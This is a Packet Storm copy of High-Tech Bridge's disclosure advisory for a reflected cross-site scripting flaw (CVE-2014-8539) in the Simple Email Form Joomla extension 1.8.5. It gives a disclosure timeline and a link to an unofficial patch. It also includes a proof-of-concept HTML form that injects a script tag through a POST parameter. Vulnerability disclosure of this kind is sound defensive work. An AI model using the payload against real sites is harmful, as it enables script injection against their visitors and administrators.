exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Joomla Simple Email Form 1.8.5 Cross Site Scripting

Joomla Simple Email Form 1.8.5 Cross Site Scripting
Posted Nov 19, 2014
Authored by High-Tech Bridge SA | Site htbridge.com

Joomla Simple Email Form version 1.8.5 suffers from a cross site scripting vulnerability.

tags | exploit, xss
advisories | CVE-2014-8539
SHA-256 | bdbf6b422078d438cc5d2cb5bad7c4962ce78742be7e3d0a971d871344bb0b35

Joomla Simple Email Form 1.8.5 Cross Site Scripting

Change Mirror Download
Advisory ID: HTB23241
Product: Simple Email Form Joomla Extension
Vendor: Doug Bierer
Vulnerable Version(s): 1.8.5 and probably prior
Tested Version: 1.8.5
Advisory Publication: October 29, 2014 [without technical details]
Vendor Notification: October 29, 2014
Public Disclosure: November 19, 2014
Vulnerability Type: Cross-Site Scripting [CWE-79]
CVE Reference: CVE-2014-8539
Risk Level: Medium
CVSSv2 Base Score: 4.3 (AV:N/AC:M/Au:N/C:N/I:P/A:N)
Solution Status: Solution Available
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ )

-----------------------------------------------------------------------------------------------

Advisory Details:

High-Tech Bridge Security Research Lab discovered vulnerability in Simple Email Form Joomla Extension, which can be exploited to perform Cross-Site Scripting (XSS) attacks against visitors and administrators of Joomla websites with installed plugin.


1) Reflected Cross-Site Scripting (XSS) in Simple Email Form Joomla Extension: CVE-2014-8539

Input passed via the "mod_simpleemailform_field2_1" HTTP POST parameter to "/index.php" script is not properly sanitised before being returned to the user. A remote attacker can trick a logged-in user to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website.

The exploitation example below uses the "alert()" JavaScript function to display "immuniweb" word:


<form action="http://[host]/index.php" method="post" name="main">
<input type="hidden" name="mod_simpleemailform_field1_1" value="email@email.com">
<input type="hidden" name="mod_simpleemailform_field2_1" value='"><script>alert("immuniweb");</script>'>
<input type="hidden" name="mod_simpleemailform_submit_1" value="Submit">
<input type="submit" id="btn">
</form>


-----------------------------------------------------------------------------------------------

Solution:

Disclosure timeline:
2014-10-29 Vendor Alerted via emails.
2014-11-06 Vendor Alerted via emails.
2014-11-14 Fix Requested via emails.
2014-11-17 Fix Requested via emails.
2014-11-19 Public disclosure with self-written patch.

Currently we are not aware of any official solution for this vulnerability.
Unofficial patch was developed by High-Tech Bridge Security Research Lab and is available here: https://www.htbridge.com/advisory/HTB23241-patch.zip

-----------------------------------------------------------------------------------------------

References:

[1] High-Tech Bridge Advisory HTB23241 - https://www.htbridge.com/advisory/HTB23241 - Reflected Cross-Site Scripting (XSS) in Simple Email Form Joomla Extension.
[2] Simple Email Form Joomla Extension - http://extensions.joomla.org/extensions/contacts-and-feedback/contact-forms/11494 - Lightweight email contact form with 8 configurable fields, plus a field for uploading attachments to the email, and a CAPTCHA based in Text_CAPTCHA from the PEAR library (included).
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.
[5] ImmuniWeb® SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual web application penetration test and cutting-edge vulnerability scanner available online via a Software-as-a-Service (SaaS) model.

-----------------------------------------------------------------------------------------------

Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    0 Files
  • 20
    Mar 20th
    0 Files
  • 21
    Mar 21st
    0 Files
  • 22
    Mar 22nd
    0 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    0 Files
  • 26
    Mar 26th
    0 Files
  • 27
    Mar 27th
    0 Files
  • 28
    Mar 28th
    0 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close